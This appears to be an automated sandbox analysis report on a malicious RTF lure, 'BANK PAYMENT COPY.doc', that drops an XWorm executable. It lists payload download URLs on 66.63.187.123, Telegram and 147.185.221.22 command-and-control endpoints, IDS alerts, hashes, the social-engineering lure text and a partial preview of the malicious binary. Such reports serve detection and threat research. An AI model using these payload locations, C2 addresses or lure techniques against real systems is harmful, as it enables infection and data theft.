                                        • 66.63.187.123/txt/YfDmHKYon6kpgkM.exe
                                        swift.docGet hashmaliciousNanocoreBrowse
                                        • 66.63.187.123/txt/rBn3LXCczP9Nj7f.exe
                                        NO7367027738832_789257820.docGet hashmaliciousAgentTeslaBrowse
                                        • 66.63.187.123/txt/73EtsZxIoDetWTu.exe
                                        NO7367027738832_789257820.docGet hashmaliciousAgentTeslaBrowse
                                        • 66.63.187.123/txt/73EtsZxIoDetWTu.exe
                                        147.185.221.22jQ2ryeS5ZP.exeGet hashmaliciousPureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog StealerBrowse
                                          AutoWizard.exeGet hashmaliciousQuasarBrowse
                                            dsadsadsadsadsadsaw.exeGet hashmaliciousQuasarBrowse
                                              killerdude.exeGet hashmaliciousQuasarBrowse
                                                XyjvIO6D4m.exeGet hashmaliciousXWormBrowse
                                                  vtCneOrnat.exeGet hashmaliciousXWormBrowse
                                                    jbG3cpmy.exeGet hashmaliciousXWormBrowse
                                                      client.exeGet hashmaliciousQuasarBrowse
                                                        file.exeGet hashmaliciousXWormBrowse
                                                          stub.exeGet hashmaliciousAsyncRATBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            api.telegram.orghttps://www.slovago.sk/webtemp/Swiss-kunden/Get hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            http://www.thailand-villas.com/img/destinations/tw/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            r8x1WvSkbWSUjXh6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            LUYYSwStKN.ps1Get hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            cFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            payload_1.vbsGet hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            4zyQ690hFT.ps1Get hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
                                                            • 149.154.167.220
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TELEGRAMRUhttp://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            http://vhm5d5.shop/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            https://lender-abang.pages.dev/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            https://telegram-message-8n5.pages.dev/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            https://channel-tele-xlocal.pages.dev/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            https://www.slovago.sk/webtemp/Swiss-kunden/Get hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            https://vpndzfast.pages.dev/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            https://soler.mom/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            https://asiter.mom/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.99
                                                            http://www.thailand-villas.com/img/destinations/tw/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            ASN-QUADRANET-GLOBALUShttps://2836500.vip/Get hashmaliciousUnknownBrowse
                                                            • 27.0.235.55
                                                            #U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                                            • 45.95.233.246
                                                            #U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                                            • 45.95.233.246
                                                            #U0641#U0631#U0627#U062e#U0648#U0627#U0646 #U0631#U0648#U0632 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                                            • 45.95.233.246
                                                            Drawing_Products_Materials_and_Samples_IMG.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 64.188.18.75
                                                            11062370MXQRQ353000718_001.docGet hashmaliciousUnknownBrowse
                                                            • 66.63.187.123
                                                            http://closingdocuments.z13.web.core.windows.net/Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.194.214.213
                                                            swift.docGet hashmaliciousNanocoreBrowse
                                                            • 66.63.187.123
                                                            ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • 192.161.184.44
                                                            jNGMZWmt23.elfGet hashmaliciousMiraiBrowse
                                                            • 195.80.56.3
                                                            SALSGIVERUSIt8DXmSFEk.exeGet hashmaliciousNjratBrowse
                                                            • 147.185.221.19
                                                            6Mt223MA25.exeGet hashmaliciousArrowRATBrowse
                                                            • 147.185.221.18
                                                            IWsK3V2Ul9.exeGet hashmaliciousArrowRATBrowse
                                                            • 147.185.221.17
                                                            SecuriteInfo.com.FileRepMalware.32767.25187.exeGet hashmaliciousUnknownBrowse
                                                            • 147.185.221.20
                                                            SecuriteInfo.com.Trojan.Siggen29.35475.19245.6407.exeGet hashmaliciousSheetRatBrowse
                                                            • 147.185.221.17
                                                            jQ2ryeS5ZP.exeGet hashmaliciousPureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog StealerBrowse
                                                            • 147.185.221.22
                                                            AutoWizard.exeGet hashmaliciousQuasarBrowse
                                                            • 147.185.221.22
                                                            dsadsadsadsadsadsaw.exeGet hashmaliciousQuasarBrowse
                                                            • 147.185.221.22
                                                            killerdude.exeGet hashmaliciousQuasarBrowse
                                                            • 147.185.221.22
                                                            SecuriteInfo.com.Trojan.TR.Dropper.Gen.22332.4876.exeGet hashmaliciousUnknownBrowse
                                                            • 147.185.221.19
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            36f7277af969a6947a61ae0b815907a114bnOjMV2N.docGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            6b58b6.msiGet hashmaliciousPureLog StealerBrowse
                                                            • 149.154.167.220
                                                            RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                            • 149.154.167.220
                                                            RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                            • 149.154.167.220
                                                            SWIFT DETAILS-ERROR.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.26981.24309.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Purchase Order.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            RFQ.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            No context
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:@...e...........................................................
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):434176
                                                            Entropy (8bit):7.724397078887104
                                                            Encrypted:false
                                                            SSDEEP:6144:3dLggcpnE0XhbB2XmCCXF1eHkfhl3USgyIPoJdrN+NZF0EDt2AvPTe8bQb:3dggiXJkw18uhJTeOdR+5hQAvC8bQb
                                                            MD5:A4CD1FF60C7B69DF5A061DF3365E60C7
                                                            SHA1:E85CD869046C923938C1268C5EED9D30F0F94668
                                                            SHA-256:657B68666C2B79D65D51A403DD7FA0E35B1109156290EFD69A681777EB6E4107
                                                            SHA-512:B6605CEFD430DF2B89FE7E48BC42FD8930BFD73D1586CB60E1CD0F42934977E4C051B8CBB45221C422B018156302552FBB8D004EE383BA997EA8987B4906BDCE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u{...............0.............f.... ........@.. ....................................@.....................................O.......................................p............................................ ............... ..H............text...l.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................F.......H........;..L+......-....g...<............................................s....}.....s....}......}.....(.......(.....*...0..C........r...p(..........+)......{.....o......{....o.....o....&...X....i2.*..0...........r...p.*.0............{....o......{....o......{....o......{....o......{....o.......{......(...+...(.....o.....(.....( .....s*.........(.............o!...("...&...*.......n..{......&..(#....*...0..|...........{....o....r...p($.....,...+2.{....o......(%........,...{....
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):16384
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:CE338FE6899778AACFC28414F2D9498B
                                                            SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                            SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                            SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):3.773012345249889
                                                            Encrypted:false
                                                            SSDEEP:768:MgI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g0kwaiFAkTSL8b/EoVy0pPp0SG:vSyemuSyem3arCbB1P5I7
                                                            MD5:616D94FA68EA4AFB727279B597153F27
                                                            SHA1:21148DD595396E5EDE0B00C49057278E198913B3
                                                            SHA-256:32E7276AD538071C1D6C69E4E771882EB9D1C2DE5C3C3E8ECC2A3F94EB84C84D
                                                            SHA-512:C1EAF069B87C1D3323DDD53FAFDE74BBF0738491B1CCBA04EA908864C3FB9DEB3CA0B678AA3EBADD96404943B1AC85BD1954885F72B1DD516977EA2CC8A2B096
                                                            Malicious:false
                                                            Preview:4.6.3.6.9.2.2.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .t.
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:13 2023, mtime=Fri Aug 11 15:42:13 2023, atime=Wed Sep 25 05:29:54 2024, length=781664, window=hide
                                                            Category:dropped
                                                            Size (bytes):1049
                                                            Entropy (8bit):4.574507935742873
                                                            Encrypted:false
                                                            SSDEEP:12:86sosA0gXg/XAlCPCHaX8zB3B/dG5X+WHDjNC4icvbj54k4uDtZ3YilMMEpxRlj7:86hk/XTszVYareX54kVDv3qQ57u
                                                            MD5:B2DACA6D8C6FF5DC4CE9AB6AE50ADED2
                                                            SHA1:FF71CBFF95A65978964F44BDE3E6A523AF36DB05
                                                            SHA-256:1BCB5A3CCFDBB07E11DD2FBF7DB935C64CF10C690610EFDB31761284409F505E
                                                            SHA-512:E350F09E93D69BFBB2E632590FE4E16950AD2AAC1BC1CEDF5D58EF9C6DC08D1A32536DFBDB8B76F5900997DE23E09EC14751711B72FEA6EE92963630C7FCDAC9
                                                            Malicious:false
                                                            Preview:L..................F.... ......r......r......U....`............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....9Y.3..user.8......QK.X9Y.3*...&=....U...............A.l.b.u.s.....z.1......WI...Desktop.d......QK.X.WI.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2.`...9Y.3 .BANKPA~1.DOC..X.......WG..WG.*.........................B.A.N.K. .P.A.Y.M.E.N.T. .C.O.P.Y...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\721680\Users.user\Desktop\BANK PAYMENT COPY.doc.,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.A.N.K. .P.A.Y.M.E.N.T. .C.O.P.Y...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......721680..........D_....3N...W...9..W
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Generic INItialization configuration [folders]
                                                            Category:dropped
                                                            Size (bytes):68
                                                            Entropy (8bit):4.624083797069063
                                                            Encrypted:false
                                                            SSDEEP:3:M1iuFu8o4ap6lm41Fu8o4ap6lv:M054i6w54i61
                                                            MD5:775228581330FBC52A66989237CD0B19
                                                            SHA1:A3A4CBF03A90160B7AEE8F8CC88B6EF76B29594F
                                                            SHA-256:AAAA91EB72DB4017A5B05CCD0DD1DA00DE1C354BA884C5E0E6B5CCBB01BC385E
                                                            SHA-512:9D1DD47BD403824C38F4AF6F3ACC92B0C4F5553AB35CCE697ADB64AEF8820D89BAB5FF6F3D50585DD4102AD9D96E4937C47B304870AF1EB01ACFFB77804EE450
                                                            Malicious:false
                                                            Preview:[doc]..BANK PAYMENT COPY.LNK=0..[folders]..BANK PAYMENT COPY.LNK=0..
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.4797606462020307
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                            MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                            SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                            SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                            SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                            Malicious:false
                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2
                                                            Entropy (8bit):1.0
                                                            Encrypted:false
                                                            SSDEEP:3:Qn:Qn
                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                            Malicious:false
                                                            Preview:..
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):434176
                                                            Entropy (8bit):7.724397078887104
                                                            Encrypted:false
                                                            SSDEEP:6144:3dLggcpnE0XhbB2XmCCXF1eHkfhl3USgyIPoJdrN+NZF0EDt2AvPTe8bQb:3dggiXJkw18uhJTeOdR+5hQAvC8bQb
                                                            MD5:A4CD1FF60C7B69DF5A061DF3365E60C7
                                                            SHA1:E85CD869046C923938C1268C5EED9D30F0F94668
                                                            SHA-256:657B68666C2B79D65D51A403DD7FA0E35B1109156290EFD69A681777EB6E4107
                                                            SHA-512:B6605CEFD430DF2B89FE7E48BC42FD8930BFD73D1586CB60E1CD0F42934977E4C051B8CBB45221C422B018156302552FBB8D004EE383BA997EA8987B4906BDCE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u{...............0.............f.... ........@.. ....................................@.....................................O.......................................p............................................ ............... ..H............text...l.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................F.......H........;..L+......-....g...<............................................s....}.....s....}......}.....(.......(.....*...0..C........r...p(..........+)......{.....o......{....o.....o....&...X....i2.*..0...........r...p.*.0............{....o......{....o......{....o......{....o......{....o.......{......(...+...(.....o.....(.....( .....s*.........(.............o!...("...&...*.......n..{......&..(#....*...0..|...........{....o....r...p($.....,...+2.{....o......(%........,...{....
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.4797606462020307
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                            MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                            SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                            SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                            SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                            Malicious:false
                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (25394), with CRLF, CR, LF line terminators
                                                            Entropy (8bit):2.3925058252552347
                                                            TrID:
                                                            • Rich Text Format (4004/1) 100.00%
                                                            File name:BANK PAYMENT COPY.doc
                                                            File size:781'664 bytes
                                                            MD5:2ac91d79a602fe37092bd6f878f4ae2d
                                                            SHA1:dfebe627e262e9edf9ee1fe2ebc706f4bd1356d3
                                                            SHA256:30096d5c8c4854311558a13ab825884fa3accfb27de30f3e2ba85e70bf0f6ab7
                                                            SHA512:2c7e521a981e999661b79500c89dd766c41a51ae28052b7ac31832301c2073a187b2294a21b7fc7da0119ce1fdba42074d7d54039ad96a4cea978c54f14a9a5b
                                                            SSDEEP:6144:jwAYwA5h9GaT5F2qHd8FRverQl9oaIH1v8iKO:q
                                                            TLSH:F4F4222EE34F06699F529776971B1E4A05BCB62DF38541B1386C873437EAC3E42225BC
                                                            File Content Preview:{\rt..{\*\tP3JwzP9vnwwgQh2S9cG4ah9JRaJZfIGghHG98cZWTbtwET69IPAaSrKkE0eq2WakNd42WMcTJ2oZC12XeqMPdKqQWCtd8oyt4AesIBhZxFbqTvDOrxnpId68xCwD7gptSsuwccEa5IA2Df5TamL7ZJVeC3}..{\84636922please click Enable editing from the yellow bar above.The independent auditor
                                                            Icon Hash:2764a3aaaeb7bdbf
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-09-25T08:30:00.566009+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1166.63.187.12380192.168.2.2249163TCP
                                                            2024-09-25T08:30:00.842927+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2166.63.187.12380192.168.2.2249163TCP
                                                            2024-09-25T08:30:08.034876+02002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.2249164149.154.167.220443TCP
                                                            2024-09-25T08:30:45.408668+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.2249173147.185.221.2255202TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 25, 2024 08:29:59.836406946 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:29:59.841351032 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:29:59.841486931 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:29:59.841695070 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:29:59.846498013 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.560942888 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.560972929 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.560987949 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.561000109 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.561012030 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.561027050 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.561042070 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.561114073 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.561125040 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.561127901 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.561145067 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.561167002 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.561167002 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.561186075 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.565449953 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.566009045 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.566037893 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.566051960 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.566117048 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.566117048 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.696343899 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.696369886 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.696386099 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.696399927 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.696517944 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.696531057 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.696546078 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.696589947 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.696602106 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.696693897 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.696758032 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.696770906 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.696790934 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.696790934 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.696825981 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.697117090 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.697146893 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.697159052 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.697204113 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.697204113 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.697204113 CEST4916380192.168.2.2266.63.187.123
                                                            Sep 25, 2024 08:30:00.697212934 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.697231054 CEST804916366.63.187.123192.168.2.22
                                                            Sep 25, 2024 08:30:00.697283030 CEST4916380192.168.2.2266.63.187.123
